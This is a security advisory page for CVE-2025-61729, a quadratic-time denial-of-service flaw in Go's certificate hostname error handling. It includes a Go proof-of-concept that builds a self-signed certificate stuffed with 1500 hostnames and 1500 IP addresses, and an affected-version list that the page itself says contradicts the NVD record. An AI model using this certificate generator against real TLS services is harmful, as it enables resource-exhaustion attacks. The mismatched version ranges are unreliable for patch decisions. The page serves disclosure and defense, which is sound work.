Security Vulnerability Report
CVE-2025-61729 CVSS 7.5 HIGH

CVE-2025-61729

Published: 2025-12-02 19:15:51
Last Modified: 2025-12-19 18:25:28

Description

Within HostnameError.Error(), when constructing an error string, there is no limit to the number of hosts that will be printed out. Furthermore, the error string is constructed by repeated string concatenation, leading to quadratic runtime. Therefore, a certificate provided by a malicious actor can result in excessive resource consumption.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:golang:go:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:golang:go:*:*:*:*:*:*:*:* - VULNERABLE
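Go < 1.22.12
Go < 1.23.0-0.20241104.193913-7657641d6f87
Go 1.22.x series < 1.22.12
Go 1.23.x series < 1.23.6
Go 1.24.x series < 1.24.0
Note: these ranges do not match the raw NVD record at the bottom of this page, which marks Go as vulnerable before 1.24.11, and from 1.25.0 up to (but excluding) 1.25.5. When checking a deployment, rely on the NVD ranges and the vendor advisory referenced in that record.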

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
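// CVE-2025-61729 PoC - Malicious Certificate Resource Exhaustion
//
// This PoC generates a self-signed certificate with an excessive number of
// subject alternative names, the input shape that triggers quadratic runtime
// in HostnameError.Error() on affected Go releases. The program only prints a
// PEM-encoded certificate; it performs no network activity.
//
// Defensive notes:
//   - Remediation is a Go upgrade. The NVD record for this CVE lists releases
//     before 1.24.11, and 1.25.0 up to (but excluding) 1.25.5, as vulnerable.
//   - The cost is paid where the hostname-mismatch error is turned into a
//     string (logging, wrapping, returning it to a caller), so CPU spikes that
//     coincide with hostname verification failures are worth investigating.
//   - NOTE(review): certificates with thousands of SAN entries are unusual;
//     alerting on SAN count or certificate size at a TLS-terminating proxy is
//     a plausible detection signal. Confirm against your own traffic.
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"fmt" // used by fmt.Sprintf below; the published listing omitted this import
	"math/big"
	"net"
	"time"
)

// generateMaliciousCertificate builds a self-signed certificate carrying 1500
// DNS names and 1500 IP addresses as subject alternative names and prints it
// in PEM form. It panics if key generation or certificate creation fails.
func generateMaliciousCertificate() {
	// Generate RSA private key
	privateKey, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}

	// Create a certificate with excessive hostnames (1000+).
	// This will cause quadratic runtime when Error() is called on the
	// resulting HostnameError in an affected Go release.
	const sanCount = 1500
	largeIPAddresses := make([]net.IP, 0, sanCount)
	largeDNSNames := make([]string, 0, sanCount)

	// Generate 1500 hostnames to trigger resource exhaustion
	for i := 0; i < sanCount; i++ {
		largeDNSNames = append(largeDNSNames, fmt.Sprintf("malicious-hostname-%d.example.com", i))
		// i/256 stays below 6 and i%256 below 256, so every address parses.
		largeIPAddresses = append(largeIPAddresses, net.ParseIP(fmt.Sprintf("192.168.%d.%d", i/256, i%256)))
	}

	template := x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject: pkix.Name{
			Organization: []string{"Malicious Org"},
		},
		NotBefore:   time.Now(),
		NotAfter:    time.Now().Add(365 * 24 * time.Hour),
		KeyUsage:    x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature,
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
		DNSNames:    largeDNSNames,
		IPAddresses: largeIPAddresses,
	}

	// Self-signed: the template is passed as both the certificate and its parent.
	certDER, err := x509.CreateCertificate(rand.Reader, &template, &template, &privateKey.PublicKey, privateKey)
	if err != nil {
		panic(err)
	}

	certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: certDER})
	// The builtin println writes to standard error.
	println(string(certPEM))
}

func main() {
	generateMaliciousCertificate()
}

// Attack simulation - how the vulnerability is triggered:
//  1. Attacker crafts a certificate with 1500+ hostnames
//  2. Server receives the malicious certificate
//  3. crypto/x509 validates the certificate
//  4. On a hostname mismatch, HostnameError.Error() is called and lists the
//     certificate's names with no limit
//  5. String concatenation causes O(n²) runtime
//  6. Server experiences high CPU/memory consumption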

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61729", "sourceIdentifier": "[email protected]", "published": "2025-12-02T19:15:51.447", "lastModified": "2025-12-19T18:25:28.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Within HostnameError.Error(), when constructing an error string, there is no limit to the number of hosts that will be printed out. Furthermore, the error string is constructed by repeated string concatenation, leading to quadratic runtime. Therefore, a certificate provided by a malicious actor can result in excessive resource consumption."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.24.11", "matchCriteriaId": "F2E6FD2A-A487-4099-B91D-2429F286AC6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.25.0", "versionEndExcluding": "1.25.5", "matchCriteriaId": "39C03A37-B94B-46E4-B1C2-A70A870F8E53"}]}]}], "references": [{"url": "https://go.dev/cl/725920", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://go.dev/issue/76445", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4", "source": "[email protected]", "tags": ["Mailing 
List", "Release Notes"]}, {"url": "https://pkg.go.dev/vuln/GO-2025-4155", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}